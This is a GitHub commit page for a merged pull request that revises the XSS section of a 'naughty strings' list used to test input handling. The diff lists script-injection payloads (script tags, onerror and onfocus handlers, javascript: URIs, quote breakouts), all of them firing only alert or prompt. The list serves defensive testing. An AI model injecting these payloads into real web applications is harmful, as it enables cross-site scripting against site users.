Skip to content

Commit

Permalink
Merge pull request #35 from jlennox/master
Browse files Browse the repository at this point in the history
Clean up XSS strings a bit. Add a few more.
  • Loading branch information
minimaxir committed Aug 12, 2015
2 parents d981a1f + 6ac5d0e commit 15bad2c
Showing 1 changed file with 24 additions and 19 deletions.
43 changes: 24 additions & 19 deletions blns.txt
Original file line number Diff line number Diff line change
Expand Up @@ -215,25 +215,30 @@ Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
#
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS') />
<svg><script>0<1>alert('XSS')</script>
"><script>alert(document.title)</script>
'><script>alert(document.title)</script>
><script>alert(document.title)</script>
</script><script>alert(document.title)</script>
< / script >< script >alert(document.title)< / script >
onfocus=alert(document.title) autofocus
" onfocus=alert(document.title) autofocus
' onfocus=alert(document.title) autofocus
<script>alert(document.title)</script>
<sc<script>ript>alert('XSS')</sc</script>ript>
--><script>alert(0)</script>
";alert(0);t="
';alert(0);t='
JavaSCript:alert(0)
;alert(0);
src=JaVaSCript:prompt(9)
<script>alert(123)</script>
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
" onfocus=JaVaSCript:alert(123) autofocus
' onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
' autofocus onkeyup='javascript:alert(123)

# SQL Injection
#
Expand Down

0 comments on commit 15bad2c

Please sign in to comment.